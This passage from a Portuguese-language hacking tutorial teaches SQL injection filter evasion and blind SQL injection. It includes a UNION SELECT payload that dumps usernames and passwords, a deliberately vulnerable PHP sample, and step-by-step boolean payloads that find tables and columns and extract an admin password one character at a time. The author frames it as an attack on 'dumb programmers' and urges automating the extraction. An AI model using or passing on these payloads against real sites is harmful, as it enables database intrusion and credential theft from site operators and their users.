                Como vocês já sabem, em toda parte do mundo há programadores burros, ou melhor, MUITO burros.
Já encontrei filtros ridículos por aí (não só filtros para SQL Injection). Alguns programadores removem
os espcaços da URL ou fazem uma verificação feia. Porém, este tipo de filtro é extremamente
fácil de ser burlado.
                Nós podemos substituir os espaços da URL por "/**/" e inserir o número das colunas em hex. Para
vocês entenderem melhor, vou exemplificar:

http://www.fvox.com/noticias.php?id=-1 union all select 1,concat_ws(0x3a,username,password),3 from
users--
/**/users--

                Fim do tutorial sobre SQL Injection.


---------------------------------
                BLIND SQL INJECTION ATTACK
---------------------------------


#########################
 [0x00] - Sobre o ataque
#########################

                Como eu já expliquei acima, SQL Injection é uma técnica baseada nos erros que o script
que realiza a conexão nos mostra em caso de erro. A principal diferença entre o SQL
Injection normal e o Blind SQL Injection é que em Blind, não necessitamos das informações
que o servidor nos mostra.
                É por isso que o nome do ataque é "Blind Injection" (Injeção cega em português). Nós apenas
injetamos algo e o servidor retorna apenas valores booleanos (true ou false) durante o ataque.


########################################
 [0x10] - Verificando a vulnerabilidade
########################################
               
                Nesta parte da matéria, eu usarei como exemplo este script:
               
<?php
/* [...] */
$id = $_GET['id'];
$sql = "SELECT * FROM noticias WHERE id = '$id'";
$q = mysql_query($sql);

$r = @mysql_fetch_row($q);
/* [...] */
?>

                Como pudemos ver, o script esconde os erros da função mysql_fetch_row() utilizando
o operador de controle de erro "@" antes de chamar a função. Muitos programadores
acreditam que assim eles estarão seguros, mas é aí que eles se enganam, mWhahHaHAhaHa.
                Para verificar se um site está ou não vulnerável, nós adicionados uma string na URL.
Se a página retorna o valor true, a página é exibida normalmente. Se a página retornar
false, não deve ser exibido a consulta na página (no caso, a notícia).



####################
 [0x12] - Achando uma tabela
####################

                Seguindo o exemplo da matéria sobre SQL Injection, vou manter a tabela 'admin'. O
exemplo abaixo retorna FALSE porque não existe uma tabela chamada "users".

http://www.fvox.com/noticias.php?id=1 AND(SELECT Count(*) FROM users)

                Agora se tentarmos com a tabela 'admin' o site retornaria TRUE:

http://www.fvox.com/noticias.php?id=1 AND(SELECT Count(*) FROM admin)


#############################
 [0x13] - Achando uma coluna
#############################

                Pegar o conteúdo de uma coluna é bem fácil. O problema, como sempre, é capturar
o nome dela. Essa história de ficar adivinhando o nome das tabelas e coluna é chata!
                O exemplo abaixo retorna FALSE porque a coluna "nick" não existe:
               
http://www.fvox.com/noticias.php?id=1 AND(SELECT Count(nick) FROM admin)

                Ainda seguindo o exemplo da outra parte da matéria, temos a coluna username e
a coluna password dentro da tabela admin. E então, ao usar Count(password), o site
retornará true, avisando que a coluna PASSWORD existe:

http://www.fvox.com/noticias.php?id=1 AND(SELECT Count(password) FROM admin)


###########################
 [0x14] - Capturando dados
###########################
               
                Para pegar o conteúdo de uma coluna, nós temos que adivinhar outra coisa, mas
dessa vez é algo mais simples. Temos que adivinhar a quantidade de caracteres que
o valor dessa coluna possui.
                Por exemplo, se a senha do admin que está na coluna PASSWORD da tabela ADMIN é
"synyster", vimos que esta senha possui 8 caracteres. Agora vamos montar o exploit:

http://www.fvox.com/noticias.php?id=1 AND(SELECT length(password) FROM admin where
id=1)=4 //FALSE
http://www.fvox.com/noticias.php?id=1 AND(SELECT length(password) FROM admin where
id=1)=6 //FALSE
http://www.fvox.com/noticias.php?id=1 AND(SELECT length(password) FROM admin where
id=1)=8 //TRUE

                Agora que já sabemos quantos caracteres a senha do administrador tem, nós
precisamos pegar caractere por caractere. Acho que é a pior parte. Eu recomendo que
vocês programem um script que teste caractere por caractere, porque fazer na mão
vai ser foda!
                Por exemplo, o valor da letra "f" em ascii é 102. E então, vou fazer a verificação
para ver se a primeira letra da coluna PASSWORD da tabela ADMIN é "f":

http://www.fvox.com/noticias.php?id=1 AND ascii(substring((SELECT concat(password) from
admin limit 0,1),1,1))=102

                Neste caso, o site iria retornar false, pois como citei no exemplo acima, a senha
do admin é "synyster". Se eu tivesse colocado o valor da letra "s" ali, o site iria
retornar true. Agora, para exemplificar melhor, eu irei pegar o segundo caractere:

http://www.fvox.com/noticias.php?id=1 AND ascii(substring((SELECT concat(password) from
admin limit 0,1),2,1))=121

                O site retornou TRUE, pois o segundo caractere é 121 (y). Realmente é bem chato ficar
testando caractere por caractere, mas há diversas tools por ai que facilitam este trabalho.

Fim do tutorial.